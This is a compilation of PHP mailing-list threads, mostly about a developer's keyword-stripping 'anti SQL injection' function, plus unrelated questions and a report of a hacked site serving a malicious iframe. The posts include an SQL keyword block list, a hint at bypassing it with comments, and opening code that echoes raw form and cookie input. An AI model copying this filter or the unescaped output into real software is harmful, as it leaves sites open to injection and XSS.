> $fname=STRIPSLASHES($_POST['fname']);
> $lname=STRIPSLASHES($_POST['lname']);
> $street=STRIPSLASHES($_POST['street']);
> $town=STRIPSLASHES($_POST['town']);
> $zip=STRIPSLASHES($_POST['zip']);
> $county=STRIPSLASHES($_POST['county']);
> $phone=STRIPSLASHES($_POST['phone']);
> $email=STRIPSLASHES($_POST['email']);
> $assess_value=$_COOKIE['assess_value'];
> $sale_value=$_COOKIE['sale_value'];
>
>
> echo "Thank you $fname for your submission!";
> echo "You have submitted the following information.";
> echo "Name:$fname $lname";
> echo "Address:$street $town $zip";
> echo "Phone Number: $phone";
> echo "E-Mail Address: $email";
> echo "You believe your home would sell for $"; echo
> $_COOKIE['sale_cookie'];
> ?> echo "Your assessment value is $"; echo $_COOKIE['assess_cookie'];?> /> echo "You live in $county";
>
>
>
>
>
> ?>
>
>
>
>
>
> "Lists" wrote in message news:49f790ed.5040...@euca.us...
> > Andr
[PHP] SQL Injection - Solution
Hi folks,
Someone know how i can improve this function to protect my envairounment
vars of sql injection attacks.
that is the function i use to do this, but, some people think is not enough:
* @uses $_REQUEST= _antiSqlInjection($_REQUEST);
* @uses $_POST = _antiSqlInjection($_POST);
* @uses $_GET = _antiSqlInjection($_GET);
*
* @author Igor Escobar
* @email blog [at] igorescobar [dot] com
*
*/
function _antiSqlInjection($Target){
$sanitizeRules =
array('OR','FROM,'SELECT','INSERT','DELETE','WHERE','DROP TABLE','SHOW
TABLES','*','--','=');
foreach($Target as $key => $value):
if(is_array($value)): $arraSanitized[$key] =
_antiSqlInjection($value);
else:
$arraSanitized[$key] =
addslashes(strip_tags(trim(str_replace($sanitizeRules,"",$value;
endif;
endforeach;
return $arraSanitized;
}
You can help me to improve them?
Regards,
Igor Escobar
Systems Analyst & Interface Designer
--
Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar
Re: [PHP] SQL Injection - Solution
I know that use the mysql_real_escape_string to do de job is better but you
should consider that the this function don't have any access to the data
base, to objective of this function is sanitize the string.
And please, see my second answer, i make some updates in the function that
possibly is relevant.
Regards,
Igor Escobar
Systems Analyst & Interface Designer
--
Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar
On Wed, May 6, 2009 at 1:14 PM, Andrew Ballard wrote:
> On Wed, May 6, 2009 at 12:06 PM, Bruno Fajardo
> wrote:
> > Hi there!
> >
> > 2009/5/6 Igor Escobar
> >>
> >> Hi folks,
> >> Someone know how i can improve this function to protect my envairounment
> >> vars of sql injection attacks.
> >>
> >> that is the function i use to do this, but, some people think is not
> enough:
> >>
> >> * @uses $_REQUEST= _antiSqlInjection($_REQUEST);
> >> * @uses $_POST = _antiSqlInjection($_POST);
> >> * @uses $_GET = _antiSqlInjection($_GET);
> >> *
> >> * @author Igor Escobar
> >> * @email blog [at] igorescobar [dot] com
> >> *
> >> */
> >>
> >> function _antiSqlInjection($Target){
> >>$sanitizeRules =
> >> array('OR','FROM,'SELECT','INSERT','DELETE','WHERE','DROP TABLE','SHOW
> >> TABLES','*','--','=');
> >>foreach($Target as $key => $value):
> >>if(is_array($value)): $arraSanitized[$key] =
> _antiSqlInjection($value);
> >>else:
> >>$arraSanitized[$key] =
> >> addslashes(strip_tags(trim(str_replace($sanitizeRules,"",$value;
> >>endif;
> >>endforeach;
> >>return $arraSanitized;
> >>
> >>
> >> }
> >>
> >> You can help me to improve them?
> >
> > What if someone posts, in any form of your app, a message containing
> > "or", "from" or "where"? Those are very common words, and eliminate
> > them is not the best solution, IMO.
> > Use mysql_real_escape_string() like Shawn said, possibly something
> > like this would do the trick (from
> > http://br2.php.net/manual/en/function.mysql-query.php):
> >
> > $query = sprintf("SELECT firstname, lastname, address, age FROM
> > friends WHERE firstname='%s' AND lastname='%s'",
> > mysql_real_escape_string($firstname),
> > mysql_real_escape_string($lastname));
> >
> > Cheers,
> > Bruno.
>
> +1
>
> I would stick with parameterized queries if available, or just use
> mysql_real_escape_string() for these and a few more reasons:
>
> 1) You'll find lots of posts in the archives explaining why
> mysql_real_escape_string() is preferred over addslashes() for this
> purpose.
>
> 2) strip_tags has absolutely nothing to do with SQL injection. Neither
> does trim(). There are cases where you would not want to use either of
> those functions on input, but you would still need to guard against
> injection.
>
> 3) DROP TABLE will work no matter how many white-space characters
> appeared between the words. For that matter, I am pretty sure that
> 'DROP /* some bogus SQL comment to make it past your filter */ TABLE'
> will work also.
>
>
> Andrew
>
Re: [PHP] Re: SQL Injection - Solution
hun...by the way I forgot to mention, I am Brazilian and here in Brazil
these words are not common ...
That is a recursive function and i can use array_map becouse i some cases we
obtain arrays of arrays and that will generate a error.
Regards,
Igor Escobar
Systems Analyst & Interface Designer
--
Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar
On Wed, May 6, 2009 at 2:36 PM, Shawn McKenzie wrote:
> Igor Escobar wrote:
> > Hunnn...
> >
> > So, what do you think now?
> >
> > function _antiSqlInjection($Target){
> > $sanitizeRules =
> > array('OR','FROM','SELECT','INSERT','DELETE','WHERE','DROP
> > TABLE','SHOW TABLES','*','--','=');
> > foreach($Target as $key => $value):
> > if(is_array($value)): $arraSanitized[$key] =
> > _antiSqlInjection($value);
> > else:
> > $arraSanitized[$key] = (!get_magic_quotes_gpc()) ?
> > addslashes(str_ireplace(trim($sanitizeRules,"",$value))) :
> > str_ireplace(trim($sanitizeRules,"",$value));
> > endif;
> > endforeach;
> > return $arraSanitized;
> > }
> >
> Stay on list please. I don't like the ternary or the brace omissions
> (alternate syntax) :-) however
>
> My point was that in my opinion you don't need the replace at all.
> Also, do you really want to strip all 'or', * and = from all fields?
> These may be perfectly valid in your app. Or is a very, very common
> word, so is from and come to think of it, where, select, insert and delete.
>
> For any of the SQL injections to work in your query, there will need to
> be quotes or the backtick ` in the user supplied content. The quotes
> are escaped by mysql_real_escape_string().
>
> I don't see any way for a SQL injection without the user input
> containing quotes or the backtick to break out of your query or
> prematurely terminate an expression. Some examples here, however they
> don't mention the backtick:
> http://us2.php.net/manual/en/security.database.sql-injection.php
>
> This might be more useful:
>
> ||function _antiSqlInjection($Target)
> {
>if(is_array($Target)) {
>$Value = array_map('_antiSqlInjection', $Target);
>} else {
> if(get_magic_quotes_gpc()) {
> $Target = stripslashes($Target);
>}
> // replace backtick with single quote or whatever
>$Target = str_replace("`", "'", $Target);
>$Value = mysql_real_escape_string($Target);
>}
>return $Value;
> }
>
> Thanks!
> -Shawn
>
>
>
Re: [PHP] Re: SQL Injection - Solution
Now i realize... i sent only to the Shawn the modified functions... here
goes:
function _antiSqlInjection($Target){
$sanitizeRules =
array('OR','FROM','SELECT','INSERT','DELETE','WHERE','DROP TABLE','SHOW
TABLES','*','--','=');
foreach($Target as $key => $value):
if(is_array($value)): $arraSanitized[$key] =
_antiSqlInjection($value);
else:
$arraSanitized[$key] = (!get_magic_quotes_gpc()) ?
addslashes(str_ireplace(trim($sanitizeRules,"",$value))) :
str_ireplace(trim($sanitizeRules,"",$value));
endif;
endforeach;
return $arraSanitized;
}
Regards,
Igor Escobar
Systems Analyst & Interface Designer
--
Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar
On Wed, May 6, 2009 at 2:55 PM, Igor Escobar wrote:
> hun...by the way I forgot to mention, I am Brazilian and here in Brazil
> these words are not common ...
>
> That is a recursive function and i can use array_map becouse i some cases
> we obtain arrays of arrays and that will generate a error.
>
>
> Regards,
> Igor Escobar
> Systems Analyst & Interface Designer
>
> --
>
> Personal Blog
> ~ blog.igorescobar.com
> Online Portifolio
> ~ www.igorescobar.com
> Twitter
> ~ @igorescobar
>
>
>
>
>
> On Wed, May 6, 2009 at 2:36 PM, Shawn McKenzie wrote:
>
>> Igor Escobar wrote:
>> > Hunnn...
>> >
>> > So, what do you think now?
>> >
>> > function _antiSqlInjection($Target){
>> > $sanitizeRules =
>> > array('OR','FROM','SELECT','INSERT','DELETE','WHERE','DROP
>> > TABLE','SHOW TABLES','*','--','=');
>> > foreach($Target as $key => $value):
>> > if(is_array($value)): $arraSanitized[$key] =
>> > _antiSqlInjection($value);
>> > else:
>> > $arraSanitized[$key] = (!get_magic_quotes_gpc()) ?
>> > addslashes(str_ireplace(trim($sanitizeRules,"",$value))) :
>> > str_ireplace(trim($sanitizeRules,"",$value));
>> > endif;
>> > endforeach;
>> > return $arraSanitized;
>> > }
>> >
>> Stay on list please. I don't like the ternary or the brace omissions
>> (alternate syntax) :-) however
>>
>> My point was that in my opinion you don't need the replace at all.
>> Also, do you really want to strip all 'or', * and = from all fields?
>> These may be perfectly valid in your app. Or is a very, very common
>> word, so is from and come to think of it, where, select, insert and
>> delete.
>>
>> For any of the SQL injections to work in your query, there will need to
>> be quotes or the backtick ` in the user supplied content. The quotes
>> are escaped by mysql_real_escape_string().
>>
>> I don't see any way for a SQL injection without the user input
>> containing quotes or the backtick to break out of your query or
>> prematurely terminate an expression. Some examples here, however they
>> don't mention the backtick:
>> http://us2.php.net/manual/en/security.database.sql-injection.php
>>
>> This might be more useful:
>>
>> ||function _antiSqlInjection($Target)
>> {
>>if(is_array($Target)) {
>>$Value = array_map('_antiSqlInjection', $Target);
>>} else {
>> if(get_magic_quotes_gpc()) {
>> $Target = stripslashes($Target);
>>}
>> // replace backtick with single quote or whatever
>>$Target = str_replace("`", "'", $Target);
>>$Value = mysql_real_escape_string($Target);
>>}
>>return $Value;
>> }
>>
>> Thanks!
>> -Shawn
>>
>>
>>
>
Re: [PHP] Re: SQL Injection - Solution
Yeah yeah, i understood that, but, the point is... i sad previously, my
function is not tied to any database.
Is a generic function, i dont know who be use this, so i don't know, what is
your data base so, i can't use functions like mysql_real_scape_string etc...
Regards,
Igor Escobar
Systems Analyst & Interface Designer
--
Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar
On Wed, May 6, 2009 at 3:00 PM, Bruno Fajardo wrote:
> 2009/5/6 Igor Escobar :
> > hun...by the way I forgot to mention, I am Brazilian and here in
> Brazil
> > these words are not common ...
>
> Igor,
>
> I'm brazilian too, but that is not the point. Deny the use of *any*
> word as input in your app is unnecessary. The problem that you're
> trying to solve, has been solved a long time ago.
>
> Bruno.
>
> >
> > That is a recursive function and i can use array_map becouse i some cases
> we
> > obtain arrays of arrays and that will generate a error.
> >
> >
> > Regards,
> > Igor Escobar
> > Systems Analyst & Interface Designer
> >
> > --
> >
> > Personal Blog
> > ~ blog.igorescobar.com
> > Online Portifolio
> > ~ www.igorescobar.com
> > Twitter
> > ~ @igorescobar
> >
> >
> >
> >
> >
> > On Wed, May 6, 2009 at 2:36 PM, Shawn McKenzie
> wrote:
> >
> >> Igor Escobar wrote:
> >> > Hunnn...
> >> >
> >> > So, what do you think now?
> >> >
> >> > function _antiSqlInjection($Target){
> >> > $sanitizeRules =
> >> > array('OR','FROM','SELECT','INSERT','DELETE','WHERE','DROP
> >> > TABLE','SHOW TABLES','*','--','=');
> >> > foreach($Target as $key => $value):
> >> > if(is_array($value)): $arraSanitized[$key] =
> >> > _antiSqlInjection($value);
> >> > else:
> >> > $arraSanitized[$key] = (!get_magic_quotes_gpc()) ?
> >> > addslashes(str_ireplace(trim($sanitizeRules,"",$value))) :
> >> > str_ireplace(trim($sanitizeRules,"",$value));
> >> > endif;
> >> > endforeach;
> >> > return $arraSanitized;
> >> > }
> >> >
> >> Stay on list please. I don't like the ternary or the brace omissions
> >> (alternate syntax) :-) however
> >>
> >> My point was that in my opinion you don't need the replace at all.
> >> Also, do you really want to strip all 'or', * and = from all fields?
> >> These may be perfectly valid in your app. Or is a very, very common
> >> word, so is from and come to think of it, where, select, insert and
> delete.
> >>
> >> For any of the SQL injections to work in your query, there will need to
> >> be quotes or the backtick ` in the user supplied content. The quotes
> >> are escaped by mysql_real_escape_string().
> >>
> >> I don't see any way for a SQL injection without the user input
> >> containing quotes or the backtick to break out of your query or
> >> prematurely terminate an expression. Some examples here, however they
> >> don't mention the backtick:
> >> http://us2.php.net/manual/en/security.database.sql-injection.php
> >>
> >> This might be more useful:
> >>
> >> ||function _antiSqlInjection($Target)
> >> {
> >>if(is_array($Target)) {
> >>$Value = array_map('_antiSqlInjection', $Target);
> >>} else {
> >> if(get_magic_quotes_gpc()) {
> >> $Target = stripslashes($Target);
> >>}
> >> // replace backtick with single quote or whatever
> >>$Target = str_replace("`", "'", $Target);
> >>$Value = mysql_real_escape_string($Target);
> >>}
> >>return $Value;
> >> }
> >>
> >> Thanks!
> >> -Shawn
> >>
> >>
> >>
> >
>
Re: [PHP] Re: SQL Injection - Solution
Ok guys, thanks.
Regards,
Igor Escobar
Systems Analyst & Interface Designer
--
Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar
On Thu, May 7, 2009 at 7:32 AM, Jan G.B. wrote:
> What about declare, cast, unhex, exec etc.?
> You Replace everything with "" isn't so good, I believe. Others
> mentiond it before, that *, =, select, from ETC. are valid words and
> characters in an other context.
>
> Anayse some attacks before trying to defend them. Injections can be
> heavily db-dependent, so filtering the common words might not be so
> insightful.
>
> If you really want to go the filter approach, then check out this
> project and learn from them. ;)
> http://php-ids.org/
>
>
> byebye
>
> 2009/5/6 Igor Escobar :
> > Yeah yeah, i understood that, but, the point is... i sad previously, my
> > function is not tied to any database.
> >
> > Is a generic function, i dont know who be use this, so i don't know, what
> is
> > your data base so, i can't use functions like mysql_real_scape_string
> etc...
> >
> >
> > Regards,
> > Igor Escobar
> > Systems Analyst & Interface Designer
> >
> > --
> >
> > Personal Blog
> > ~ blog.igorescobar.com
> > Online Portifolio
> > ~ www.igorescobar.com
> > Twitter
> > ~ @igorescobar
> >
> >
> >
> >
> >
> > On Wed, May 6, 2009 at 3:00 PM, Bruno Fajardo
> wrote:
> >
> >> 2009/5/6 Igor Escobar :
> >> > hun...by the way I forgot to mention, I am Brazilian and here in
> >> Brazil
> >> > these words are not common ...
> >>
> >> Igor,
> >>
> >> I'm brazilian too, but that is not the point. Deny the use of *any*
> >> word as input in your app is unnecessary. The problem that you're
> >> trying to solve, has been solved a long time ago.
> >>
> >> Bruno.
> >>
> >> >
> >> > That is a recursive function and i can use array_map becouse i some
> cases
> >> we
> >> > obtain arrays of arrays and that will generate a error.
> >> >
> >> >
> >> > Regards,
> >> > Igor Escobar
> >> > Systems Analyst & Interface Designer
> >> >
> >> > --
> >> >
> >> > Personal Blog
> >> > ~ blog.igorescobar.com
> >> > Online Portifolio
> >> > ~ www.igorescobar.com
> >> > Twitter
> >> > ~ @igorescobar
> >> >
> >> >
> >> >
> >> >
> >> >
> >> > On Wed, May 6, 2009 at 2:36 PM, Shawn McKenzie
> >> wrote:
> >> >
> >> >> Igor Escobar wrote:
> >> >> > Hunnn...
> >> >> >
> >> >> > So, what do you think now?
> >> >> >
> >> >> > function _antiSqlInjection($Target){
> >> >> > $sanitizeRules =
> >> >> > array('OR','FROM','SELECT','INSERT','DELETE','WHERE','DROP
> >> >> > TABLE','SHOW TABLES','*','--','=');
> >> >> > foreach($Target as $key => $value):
> >> >> > if(is_array($value)): $arraSanitized[$key] =
> >> >> > _antiSqlInjection($value);
> >> >> > else:
> >> >> > $arraSanitized[$key] = (!get_magic_quotes_gpc()) ?
> >> >> > addslashes(str_ireplace(trim($sanitizeRules,"",$value))) :
> >> >> > str_ireplace(trim($sanitizeRules,"",$value));
> >> >> > endif;
> >> >> > endforeach;
> >> >> > return $arraSanitized;
> >> >> > }
> >> >> >
> >> >> Stay on list please. I don't like the ternary or the brace omissions
> >> >> (alternate syntax) :-) however
> >> >>
> >> >> My point was that in my opinion you don't need the replace at all.
> >> >> Also, do you really want to strip all 'or', * and = from all fields?
> >> >> These may be perfectly valid in your app. Or is a very, very common
> >> >> word, so is from and come to think of it, where, select, insert and
> >> delete.
> >> >>
> >> >> For any of the SQL injections to work in your query, there will need
> to
> >> >> be quotes or the backtick ` in the user supplied content. The quotes
> >> >> are escaped by mysql_real_escape_string().
> >> >>
> >> >> I don't see any way for a SQL injection without the user input
> >> >> containing quotes or the backtick to break out of your query or
> >> >> prematurely terminate an expression. Some examples here, however
> they
> >> >> don't mention the backtick:
> >> >> http://us2.php.net/manual/en/security.database.sql-injection.php
> >> >>
> >> >> This might be more useful:
> >> >>
> >> >> ||function _antiSqlInjection($Target)
> >> >> {
> >> >>if(is_array($Target)) {
> >> >>$Value = array_map('_antiSqlInjection', $Target);
> >> >>} else {
> >> >> if(get_magic_quotes_gpc()) {
> >> >> $Target = stripslashes($Target);
> >> >>}
> >> >> // replace backtick with single quote or whatever
> >> >>$Target = str_replace("`", "'", $Target);
> >> >>$Value = mysql_real_escape_string($Target);
> >> >>}
> >> >>return $Value;
> >> >> }
> >> >>
> >> >> Thanks!
> >> >> -Shawn
> >> >>
> >> >>
> >> >>
> >> >
> >>
> >
>
Re: [PHP] Re: Progressbar
http://www.ajaxload.info/ Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Thu, Jun 25, 2009 at 2:03 PM, Eddie Drapkin wrote: > On Thu, Jun 25, 2009 at 12:52 PM, Bastien Koert wrote: > > On Thu, Jun 25, 2009 at 11:51 AM, Michael A. Peters > wrote: > >> Martin Scotta wrote: > >>> > >>> I found extremely un-productive editors or IDEs like Eclipse or Zend > >>> Studio. > >>> > >>> I use SciTE. > >>> > >>> It don't has any feature you are talking about... > >>> > >>> but it.. > >>> # do not eat all you ram > >>> # starts in a microsecond > >>> # opens any type of file > >>> # paints the code in pretty colors. > >>> # has a little intellisense using pre-written words or api files > >>> > >>> > >> > >> I almost exclusively use bluefish, the closest I come to an IDE for > anything > >> I do is emacs + AUCTeX for my occasional TeX needs. > >> > >> I also use vim and on the rare occasions I'm stuck with Windows, > something I > >> think called PSPad (not sure, downloaded it awhile back at my parents > >> house). I actually have a license for Homesite, but I don't think I can > >> install it on their computer and I don't run Windows anymore. That was > nice. > >> > >> On a Mac - bbedit for everything. > >> > >> However, all that being said, I do very little php. Right now though a > >> little more than usual. > >> > >> -- > >> PHP General Mailing List (http://www.php.net/) > >> To unsubscribe, visit: http://www.php.net/unsub.php > >> > >> > > > > over the past little while I have been using > > > > komodo edit (free) - good (more like a text editor with some brains), > > good code completion and hinting > > aptana studio (free) - eclipse based, bigger learning curve, but lots > > of functionality > > netbeans (free) - good, nice interface > > > > > > > > > > -- > > > > Bastien > > > > Cat, the other other white meat > > > > -- > > PHP General Mailing List (http://www.php.net/) > > To unsubscribe, visit: http://www.php.net/unsub.php > > > > > > Well the thing about being productive out of the box with Zend Studio > isn't entirely related to Zend Studio, it's more of an Eclipse > problem. Eclipse itself, whether using it in a heavily modified form > like Aptana or PDT or Zend Studio, or just using it out of the box for > Java development or C/C++ development or anything in between, has a > ridiculously steep learning curve for what's really just a fancy text > editor. While this turns a lot of people off, I was lucky (although I > sure didn't think so at the time) enough to have it forced on me when > I was learning Java in school. And in the end, I'm pretty glad that I > was forced to learn Eclipse because it's been the go to editor for all > my coding needs, whether PHP, Python, C, Java, even complex shell > scripting. And whenever someone is learning to develop and gets to > the point that they'd actually take advantage of some of the more > advanced features of Eclipse - step through debugging, code > autocompletion, etc. - I recommend that they take some time out of > learning the code, or coding, and learn Eclipse. The second Java > class I took was actually "learning Eclipse" and it was one of the > more useful classes that I've taken, given that there's no longer a > learning curve for any IDE that I want to use. > > Yes, Eclipse is pretty intimidating and oftentimes more complicated > than it needs to be, but there's a level of customizability that > doesn't exist in any other editors that I've seen. Whether it's > making code look and behave exactly the same, or binding keybindings > to things like SVN commit / update / resolve, it's all possible in > Eclipse. Whether you use Aptana, PDT, Zend Studio (>= 6.0) or another > derivative, I'd definitely recommend using Eclipse and once you've > topped the learning curve, you'll be able to say that your IDE > actually boosts your productivity significantly, which is the ultimate > goal anyway. > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
[PHP] Regex Problem
Hi Folks, I have a serious problem. must create a regular expression against all that is between single quote or double quotes. Easy? Ok, i know, but i need that "everything" must to be too an single quote or double quote. If i have this SQL command: SELECT * FROM TSTRENIC.MEI_ACESSO WHERE UPPER(DS_MEI_ACS) LIKE *'%NOME' ASD ' AS'ASD'%' *AND USUARIO = *'oaksdpokasd'asda'* ORDER BY DS_MEI_ACS ASC; SELECT * FROM TSTRENIC.MEI_ACESSO WHERE USUARIO_DATA BETWEEN *'2007-01-02'*AND *'2008-07-08'* Anyone have any idea? I need an expression which case the fields in bold. Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter)
[PHP] Re: Regex Problem
The solution don't need to be with regex, if anyone can solve this with other way will be very helpfull . Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Fri, Jul 31, 2009 at 2:23 PM, Igor Escobar wrote: > Hi Folks, > I have a serious problem. > > must create a regular expression against all that is between single quote > or double quotes. Easy? Ok, i know, but i need that "everything" must to be > too an single quote or double quote. > > If i have this SQL command: > > SELECT * FROM TSTRENIC.MEI_ACESSO WHERE UPPER(DS_MEI_ACS) LIKE *'%NOME' > ASD ' AS'ASD'%' *AND USUARIO = *'oaksdpokasd'asda'* ORDER BY DS_MEI_ACS > ASC; > > SELECT * FROM TSTRENIC.MEI_ACESSO WHERE USUARIO_DATA BETWEEN *'2007-01-02' > * AND *'2008-07-08'* > > Anyone have any idea? > > > > I need an expression which case the fields in bold. > > > Regards, > Igor Escobar > Systems Analyst & Interface Designer > > + http://blog.igorescobar.com > + http://www.igorescobar.com > + @igorescobar (twitter) > > > >
Re: [PHP] Character encoding
Build some script to convert to these comments. Check this out: Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) 2009/8/5 b > On 08/05/2009 07:05 AM, Sándor Tamás (HostWare Kft.) wrote: > >> Hi, >> >> I have a mysql database, which the users can insert comments. As the users >> can be from different countries, with different character encoding, the >> mysql table can contain various special characters. >> >> How can I be sure to display these comments properly? I've found the >> mb_convert_encoding, and for some characters it works okay, but there are >> some really special characters which displayed as a '?'. >> >> Does anybody know some workarounds? >> >> Thanks, >> SanTa >> > > Use UTF-8. Create your database and its tables with UTF-8 char encoding. > eg. > > ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci > > Note there's no hyphen. > > Also, make sure the *data* is converted. You can use iconv for that. > > Next, ensure that the browser knows how to display the text. Use either a > header or a meta tag (or both): > > > > This is especially important for the page with the comments form. > > Any SQL file with your data (for import) should have the following at the > top: > > SET NAMES 'utf8'; > > If you export a dump make sure that line is present before trying to > import. > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
[PHP] Speed Issues PHP vs ASP.net
Recently i read this blog post about speed issues comparing PHP with ASP.net, please, read that and comment what you think about it: http://misfitgeek.com/blog/aspnet/php-versus-asp-net-ndash-windows-versus-linux-ndash-who-rsquo-s-the-fastest/ The big deal is: I don't know if this bechmark is true or false but, what are doing the PHP team about speed issues? Results like that maybe results like this can tarnish the image of language. So, what do you think about it? Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter)
[PHP] SWF Manipulation with PHP
Hi Folks! A very long time ago i spend a little bit of my time to find how i can load a swf file, load an specific frame of that SWF File and save this like a JPG or any other format. I try the "ming" but it can't load a external swf movie. You only can CREATE a swf. I try the libswf too but i not have a success. Anyone have ANY idea that works? Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter)
[PHP] Bitly-PHP - A PHP Bitly API to shorten URLs, expand and more.
Hi Guys! Can you help me to test my new library? It's about a PHP Library to use and enjoy the RESTful Bitly API to shorten URLs, expand and more http://github.com/igorescobar/Bitly-PHP <http://github.com/igorescobar/Bitly-PHP>Any doubts, fell free to ask. <http://github.com/igorescobar/Bitly-PHP> Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter)
Re: [PHP] Bitly-PHP - A PHP Bitly API to shorten URLs, expand and more.
Nice point. I will implement that ;) Thanks a lot! Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Wed, Mar 24, 2010 at 4:08 PM, Rene Veerman wrote: > nice code, but i'd like it better if the comments were in english ;) > > the only thing i see missing is some proper error reporting (in case > bit.ly is down or has changed api specs) > > On Wed, Mar 24, 2010 at 7:39 PM, Igor Escobar > wrote: > > Hi Guys! > > > > Can you help me to test my new library? > > It's about a PHP Library to use and enjoy the RESTful Bitly API to > shorten > > URLs, expand and more > > > > http://github.com/igorescobar/Bitly-PHP > > > > <http://github.com/igorescobar/Bitly-PHP>Any doubts, fell free to ask. > > > > <http://github.com/igorescobar/Bitly-PHP> > > Regards, > > Igor Escobar > > Systems Analyst & Interface Designer > > > > + http://blog.igorescobar.com > > + http://www.igorescobar.com > > + @igorescobar (twitter) > > >
Re: [PHP] How to redefine a function if it doesn't exist?
See
http://br2.php.net/manual/en/function.create-function.php
Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Tue, Mar 30, 2010 at 10:23 AM, David Otton <
phpm...@jawbone.freeserve.co.uk> wrote:
> On 30 March 2010 14:16, Andre Polykanine wrote:
>
> > I need a quoted_printable_encode function but it's available only
> > since PHP 5.3. How do I redefine that function only if PHP version is
> > lower than 5.3?
>
> function_exists().
>
> if (!function_exists('myfunc')) {
>function myfunc() {
>;
>}
> }
>
> http://uk3.php.net/function_exists
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
[PHP] Security Issue
Hi Folks! The portal for which I work is suffering constant attacks that I feel that is PHP Injection. Somehow the hacker is getting to change the cache files that our system generates. Concatenating the HTML file with another that have an iframe to a malicious JAR file. Do you have any suggestions to prevent this action? The hacker has no access to our file system, he is imputing the code through some security hole. The problem is that the portal is very big and has lots and lots partners hosted on our estructure structure. We are failing to identify the focus of this attacks. Any ideas? Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter)
Re: [PHP] Security Issue
Hi Ashley! Thanks for helping us! OK, first thing, check all the file access logs, i.e. FTP logs, etc, just to make sure that it's not a case of a compromised password. There's a well-known issue with people who use FileZilla on Windows systems that allows passwords to be easily stolen. * * *We've done this before. FTP logs are clean. We limit access to FTP only authorized machines. * * * Next, see if you can isolate the IP address(s) that might be making these changes, and then go back over the HTTP access logs to determine what URLs they are visiting on the site. This should give you an idea about where the attack is coming in from. *I'll see if I can find a way to identify the IP of the person who changed the file last time. As he is injecting a PHP script within our server, the script itself is changing the file so it is assumed as the default user apache as who made the change.* Make sure that any pre-built systems (i.e. shopping carts, blog or forum software) is patched and up-to-date. A lot of attacks are targeted at sites en-mass because they are found to have the same flaw which, left unpatched, is like an open door to your server. *We always encourage our partners to keep their system current. They are usually blogs (wordpress) and plugins * It's also not a bad idea to change the passwords used to access the server, both for FTP and SSH. You might also need to scan the server with antivirus software (this is mainly for Windows servers really) to make sure that a rootkit hasn't been installed. *All access via username and password are clean, if we identify unauthorized access, we will certainly do that!* * * *Thank you for your help! Let's try to identify the IP address of the person who changed the file and then we try to trace your browsing history!* * *Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 10:03 AM, Ashley Sheridan wrote: > On Mon, 2010-06-07 at 09:54 -0300, Igor Escobar wrote: > > Hi Folks! > > The portal for which I work is suffering constant attacks that I feel that > is PHP Injection. Somehow the hacker is getting to change the cache files > that our system generates. Concatenating the HTML file with another that > have an iframe to a malicious JAR file. Do you have any suggestions to > prevent this action? The hacker has no access to our file system, he is > imputing the code through some security hole. The problem is that the portal > is very big and has lots and lots partners hosted on our estructure > structure. We are failing to identify the focus of this attacks. > > Any ideas? > > > Regards, > Igor Escobar > Systems Analyst & Interface Designer > > + http://blog.igorescobar.com > + http://www.igorescobar.com > + @igorescobar (twitter) > > > OK, first thing, check all the file access logs, i.e. FTP logs, etc, just > to make sure that it's not a case of a compromised password. There's a > well-known issue with people who use FileZilla on Windows systems that > allows passwords to be easily stolen. > > Next, see if you can isolate the IP address(s) that might be making these > changes, and then go back over the HTTP access logs to determine what URLs > they are visiting on the site. This should give you an idea about where the > attack is coming in from. > > Make sure that any pre-built systems (i.e. shopping carts, blog or forum > software) is patched and up-to-date. A lot of attacks are targeted at sites > en-mass because they are found to have the same flaw which, left unpatched, > is like an open door to your server. > > It's also not a bad idea to change the passwords used to access the server, > both for FTP and SSH. You might also need to scan the server with antivirus > software (this is mainly for Windows servers really) to make sure that a > rootkit hasn't been installed. > > Thanks, > Ash > http://www.ashleysheridan.co.uk > > >
Re: [PHP] Security Issue
